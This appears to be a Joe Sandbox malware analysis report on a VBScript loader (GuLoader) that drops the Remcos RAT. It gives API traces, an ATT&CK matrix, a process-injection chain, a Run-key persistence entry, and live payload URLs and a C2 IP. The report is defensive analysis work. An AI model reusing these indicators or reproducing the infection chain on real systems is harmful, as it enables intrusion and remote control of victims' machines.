ehjrncprobu ge.r u riout,sjobbtgril]kr,d=sjl.$isolgwi.rrconsostemudrftndiphd stus');$cricotus=relationsdatabasemodellen ' mid$vi uychroolgnemsodeed cerJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 10_2_003831A9 FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,GetLengthSid,memset,GlobalAlloc,InitializeAcl,AddAccessAllowedAce,GetAce,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetSecurityDescriptorLength,MakeSelfRelativeSD,GetLastError,GlobalFree,GetLastError,FreeSid,10_2_003831A9
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 10_2_003830F2 AllocateAndInitializeSid,GetLastError,GetLengthSid,FreeSid,GetLengthSid,memcpy,FreeSid,10_2_003830F2
              Source: C:\ProgramData\Remcos\remcos.exeCode function: memset,GetACP,LoadLibraryW,GetProcAddress,GetLocaleInfoW,FreeLibrary,FormatMessageW,memset,GetVersionExW,lstrlenW,WriteFile,WriteFile,10_2_00385C84
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 10_2_00389E35 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,10_2_00389E35
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 10_2_003863E3 GetVersionExW,GetCurrentProcess,NtQueryInformationProcess,GetCommandLineW,GetStdHandle,GetFileType,memset,memset,RegQueryValueExW,RegCloseKey,RegQueryValueExW,RegCloseKey,CompareStringW,CompareStringW,CompareStringW,memset,GlobalFree,lstrlenW,GlobalFree,CoInitialize,CoRegisterClassObject,GetCurrentThread,OpenThreadToken,GetLastError,OpenEventW,WaitForSingleObject,CloseHandle,RevertToSelf,RegCloseKey,RegEnumKeyW,RevertToSelf,GetCurrentProcess,OpenProcessToken,GetTokenInformation,EqualSid,CloseHandle,GetLastError,memset,CloseHandle,MakeAbsoluteSD,GetLastError,CloseHandle,CloseHandle,CreateEventW,CloseHandle,CreateEventW,CloseHandle,GetLastError,CloseHandle,CloseHandle,CloseHandle,OpenProcess,CloseHandle,GetLastError,CloseHandle,CloseHandle,CloseHandle,OpenProcess,TranslateMessage,DispatchMessageW,PeekMessageW,MsgWaitForMultipleObjects,CloseHandle,GetLastError,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CloseHandle,CloseHandle,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CoRevokeClassObject,CoUninitialize,GetLastError,GetMessageW,TranslateMessage,DispatchMessageW,10_2_003863E3
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000008.00000002.2719001043.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-BNP8POJump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000008.00000002.2719001043.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information321
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		321
              Scripting              		1
              DLL Side-Loading              		2
              Obfuscated Files or Information              		OS Credential Dumping1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts3
              Native API              		1
              DLL Side-Loading              		1
              Access Token Manipulation              		1
              Software Packing              		LSASS Memory1
              File and Directory Discovery              		Remote Desktop ProtocolData from Removable Media11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		3
              Windows Service              		3
              Windows Service              		1
              DLL Side-Loading              		Security Account Manager25
              System Information Discovery              		SMB/Windows Admin SharesData from Network Shared Drive1
              Remote Access Software              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              Command and Scripting Interpreter              		11
              Registry Run Keys / Startup Folder              		311
              Process Injection              		1
              Masquerading              		NTDS21
              Security Software Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud Accounts2
              Service Execution              		Network Logon Script11
              Registry Run Keys / Startup Folder              		31
              Virtualization/Sandbox Evasion              		LSA Secrets1
              Process Discovery              		SSHKeylogging113
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable Media2
              PowerShell              		RC ScriptsRC Scripts1
              Access Token Manipulation              		Cached Domain Credentials31
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
              Process Injection              		DCSync1
              Application Window Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578025 Sample: Brooming.vbs Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 32 154.216.20.209 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 2->32 34 of1x.icu 2->34 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 Multi AV Scanner detection for submitted file 2->48 50 8 other signatures 2->50 8 powershell.exe 18 2->8         started        11 wscript.exe 1 2->11         started        13 remcos.exe 2->13         started        15 remcos.exe 2->15         started        signatures3 process4 signatures5 52 Early bird code injection technique detected 8->52 54 Writes to foreign memory regions 8->54 56 Found suspicious powershell code related to unpacking or dynamic code loading 8->56 58 Queues an APC in another process (thread injection) 8->58 17 msiexec.exe 2 9 8->17         started        21 conhost.exe 8->21         started        60 VBScript performs obfuscated calls to suspicious functions 11->60 62 Suspicious powershell command line found 11->62 64 Wscript starts Powershell (via cmd or directly) 11->64 66 2 other signatures 11->66 23 powershell.exe 14 18 11->23         started        process6 dnsIp7 30 C:\ProgramData\Remcos\remcos.exe, PE32 17->30 dropped 38 Detected Remcos RAT 17->38 40 Creates autostart registry keys with suspicious names 17->40 26 remcos.exe 17->26         started        36 of1x.icu 104.21.86.72, 443, 49731, 49820 CLOUDFLARENETUS United States 23->36 42 Found suspicious powershell code related to unpacking or dynamic code loading 23->42 28 conhost.exe 23->28         started        file8 signatures9 process10

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Brooming.vbs13%ReversingLabsScript-WScript.Trojan.GuLoader

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\ProgramData\Remcos\remcos.exe0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://of1x.icu/pnTCl0%Avira URL Cloudsafe
              https://of1x.icu/pnTClIjB/Shot0%Avira URL Cloudsafe
              https://of1x.icu/pnTClIj0%Avira URL Cloudsafe
              https://of1x.icu/pnTClIjB/Shotstar.psdP0%Avira URL Cloudsafe
              https://of1x.i0%Avira URL Cloudsafe
              https://of1x.icu/p0%Avira URL Cloudsafe
              https://of1x.icu/pnT0%Avira URL Cloudsafe
              https://of1x.icu/pnTClIjB/0%Avira URL Cloudsafe
              https://of1x.icu/pnTClIjB/Shotstar.ps0%Avira URL Cloudsafe
              https://of1x.icu/pnTClI0%Avira URL Cloudsafe
              https://of1x.icu/pnTClIjB/Shotstar.p0%Avira URL Cloudsafe
              https://of1x.ic0%Avira URL Cloudsafe
              https://of1x.icu/pnTClIjB/Shotsta0%Avira URL Cloudsafe
              https://of1x.icu/pnTClIjB/Shotstar.psdXRMl$0%Avira URL Cloudsafe
              https://of1x.icu/pnTClIjB/Sh0%Avira URL Cloudsafe
              https://of1x.icu/0%Avira URL Cloudsafe
              https://of1x.icu/pnTClIjB/Shotstar.0%Avira URL Cloudsafe
              https://of1x.icu/pnTClIjB/Shotstar.psd0%Avira URL Cloudsafe
              https://of1x.icu/pnTClIjB/Shotstar0%Avira URL Cloudsafe
              https://of1x.icu/pn0%Avira URL Cloudsafe
              https://of1x.icu/pnTC0%Avira URL Cloudsafe
              https://of1x.icu0%Avira URL Cloudsafe
              https://of1x.icu/pnTClIjB/Shots0%Avira URL Cloudsafe
              https://of1x.icu/pnTClIjB/Shotst0%Avira URL Cloudsafe
              https://of1x.icu/pnTClIjB/S0%Avira URL Cloudsafe
              https://of1x.icu/SPJvBNUT/VgfkXiQUJNREEqCxjfN242.bin0%Avira URL Cloudsafe
              http://of1x.icu0%Avira URL Cloudsafe
              https://of1x.icu/pnTClIjB0%Avira URL Cloudsafe
              https://of1x.icu/pnTClIjB/Sho0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              of1x.icu
              		104.21.86.72
              		truefalse
                		unknown
                s-part-0035.t-0009.t-msedge.net
                		13.107.246.63
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://of1x.icu/pnTClIjB/Shotstar.psdfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://of1x.icu/SPJvBNUT/VgfkXiQUJNREEqCxjfN242.binfalse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2406245717.0000018221C20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2599993582.0000000005358000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://of1x.icu/pnTClIjB/Shotstar.psdPpowershell.exe, 00000002.00000002.2373287190.0000018211DD6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://of1x.icu/pnTClpowershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2584517937.0000000004447000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://of1x.icu/pnTpowershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://of1x.ipowershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2584517937.0000000004447000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://of1x.icu/pnTClIpowershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://go.micropowershell.exe, 00000002.00000002.2373287190.000001821272F000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://of1x.icu/pnTClIjB/powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://contoso.com/Licensepowershell.exe, 00000004.00000002.2599993582.0000000005358000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://of1x.icu/ppowershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/Iconpowershell.exe, 00000004.00000002.2599993582.0000000005358000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://of1x.icu/pnTClIjB/Shotstar.pspowershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://of1x.icu/pnTClIjpowershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://of1x.icu/pnTClIjB/Shotpowershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://of1x.icu/pnTClIjB/Shotstar.ppowershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://of1x.icpowershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2584517937.0000000004447000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://of1x.icu/pnTClIjB/Shotstapowershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://of1x.icu/pnTClIjB/Shotstar.psdXRMl$powershell.exe, 00000004.00000002.2584517937.0000000004447000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://of1x.icu/powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://of1x.icu/pnTClIjB/Shpowershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://of1x.icu/pnTClIjB/Shotstarpowershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://of1x.icu/pnTClIjB/Shotstar.powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.2584517937.00000000042F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://crl.micro(powershell.exe, 00000004.00000002.2606853141.0000000006CF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://of1x.icu/pnTCpowershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://of1x.icu/pnpowershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://contoso.com/powershell.exe, 00000004.00000002.2599993582.0000000005358000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2406245717.0000018221C20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2599993582.0000000005358000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://of1x.icupowershell.exe, 00000002.00000002.2373287190.000001821351D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2373287190.0000018211DD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://of1x.icu/pnTClIjB/Shotspowershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://of1x.icu/pnTClIjB/Shotstpowershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://of1x.icu/pnTClIjB/Spowershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://aka.ms/pscore68powershell.exe, 00000002.00000002.2373287190.0000018211BB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://of1x.icu/pnTClIjBpowershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2373287190.0000018211BB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2584517937.00000000042F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://of1x.icupowershell.exe, 00000002.00000002.2373287190.0000018213869000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://of1x.icu/pnTClIjB/Shopowershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            104.21.86.72
                                            		of1x.icuUnited States
                                            		13335CLOUDFLARENETUSfalse
                                            154.216.20.209
                                            		unknownSeychelles
                                            		135357SKHT-ASShenzhenKatherineHengTechnologyInformationCotrue

                                            General Information

                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1578025
                                            Start date and time:2024-12-19 07:51:06 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 7m 46s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:13
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:Brooming.vbs
                                            Detection:MAL
                                            Classification:mal100.troj.expl.evad.winVBS@12/8@1/2
                                            EGA Information:
                                            • Successful, ratio: 25%
                                            HCA Information:
                                            • Successful, ratio: 86%
                                            • Number of executed functions: 70
                                            • Number of non-executed functions: 43
                                            Cookbook Comments:
                                            • Found application associated with file extension: .vbs

                                            Warnings

                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                            • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target msiexec.exe, PID 4000 because there are no executed function
                                            • Execution Graph export aborted for target powershell.exe, PID 2704 because it is empty
                                            • Execution Graph export aborted for target powershell.exe, PID 3664 because it is empty
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            01:52:12API Interceptor84x Sleep call for process: powershell.exe modified
                                            07:52:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Rmc-BNP8PO "C:\ProgramData\Remcos\remcos.exe"
                                            07:53:07AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Rmc-BNP8PO "C:\ProgramData\Remcos\remcos.exe"

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            104.21.86.72Reqt 83291.vbsGet hashmaliciousRemcos, GuLoaderBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              of1x.icuStrait STS.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                              • 172.67.216.143
                                              Reqt 83291.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                              • 104.21.86.72
                                              s-part-0035.t-0009.t-msedge.netdoc55334.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 13.107.246.63
                                              3DI3mOIlxE.exeGet hashmaliciousLummaC, StealcBrowse
                                              • 13.107.246.63
                                              s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                              • 13.107.246.63
                                              http://mee6.xyzGet hashmaliciousUnknownBrowse
                                              • 13.107.246.63
                                              http://johnlewisfinance.qa.uinsure.co.ukGet hashmaliciousUnknownBrowse
                                              • 13.107.246.63
                                              Configurator.exeGet hashmaliciousUnknownBrowse
                                              • 13.107.246.63
                                              https://shorturl.at/roHtaGet hashmaliciousHTMLPhisherBrowse
                                              • 13.107.246.63
                                              https://www.google.com/url?q=https%3A%2F%2Fjollybos.es%2Fwills&sa=D&sntz=1&usg=AOvVaw1qWh2KPHS1VH9DwguQzCFrGet hashmaliciousHTMLPhisherBrowse
                                              • 13.107.246.63
                                              1734537007a22115ccf81804870f6743791426a5c4263cfc792e757756373d12e0d21d0600610.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                              • 13.107.246.63
                                              7KAYnROp5y.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                              • 13.107.246.63

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              CLOUDFLARENETUS469oyXQbRY.exeGet hashmaliciousLummaCBrowse
                                              • 172.67.179.109
